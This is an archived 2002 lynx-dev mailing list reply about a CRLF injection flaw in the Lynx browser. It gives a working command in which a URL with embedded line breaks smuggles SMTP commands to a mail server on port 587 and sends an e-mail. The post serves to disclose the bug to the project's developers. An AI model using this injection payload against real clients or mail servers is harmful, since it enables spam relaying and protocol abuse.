Re: lynx-dev Lynx CRLF Injection (fwd)

lynx-dev

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: lynx-dev Lynx CRLF Injection (fwd)

From:	Ulf H{rnhammar
Subject:	Re: lynx-dev Lynx CRLF Injection (fwd)
Date:	Wed, 21 Aug 2002 19:57:56 +0200
User-agent:	Mutt/1.3.28i

It is also possible to use this hole for communication with other types of
servers than HTTP servers:

$ lynx "http://mail.site1.st:587/ HTTP/1.0
HELO mail.site1.st
MAIL FROM: <address@hidden>
RCPT TO: <address@hidden>
DATA
From: address@hidden
To: address@hidden
Subject: This is..

This is an URL that sends an e-mail?
.
QUIT

"

You have to use the alternate port 587, because the normal port 25 is blocked.

The MTA will complain about the "GET / HTTP/1.0" string, but it still works.

// Ulf Harnhammar

; To UNSUBSCRIBE: Send "unsubscribe lynx-dev" to address@hidden

[Prev in Thread]

Current Thread

[Next in Thread]

lynx-dev Lynx CRLF Injection (fwd), Ulf Harnhammar, 2002/08/19
- Re: lynx-dev Lynx CRLF Injection (fwd), Bela Lubkin, 2002/08/19
  - Re: lynx-dev Lynx CRLF Injection (fwd), Ulf H{rnhammar, 2002/08/20
    - Re: lynx-dev Lynx CRLF Injection (fwd), pg, 2002/08/20
    - Re: lynx-dev Lynx CRLF Injection (fwd), tg, 2002/08/20
    - Re: lynx-dev Lynx CRLF Injection (fwd), Ulf H{rnhammar, 2002/08/20
    - Re: lynx-dev Lynx CRLF Injection (fwd), Ulf H{rnhammar <=
    - Re: lynx-dev Lynx CRLF Injection (fwd), Ulf H{rnhammar, 2002/08/21

Prev by Date: Re: lynx-dev very long <title>; can we not overwrite or change ";" to "(" ?
Next by Date: Re: lynx-dev Display of SGML Greek Math entities -- solution
Previous by thread: Re: lynx-dev Lynx CRLF Injection (fwd)
Next by thread: Re: lynx-dev Lynx CRLF Injection (fwd)
Index(es):
- Date
- Thread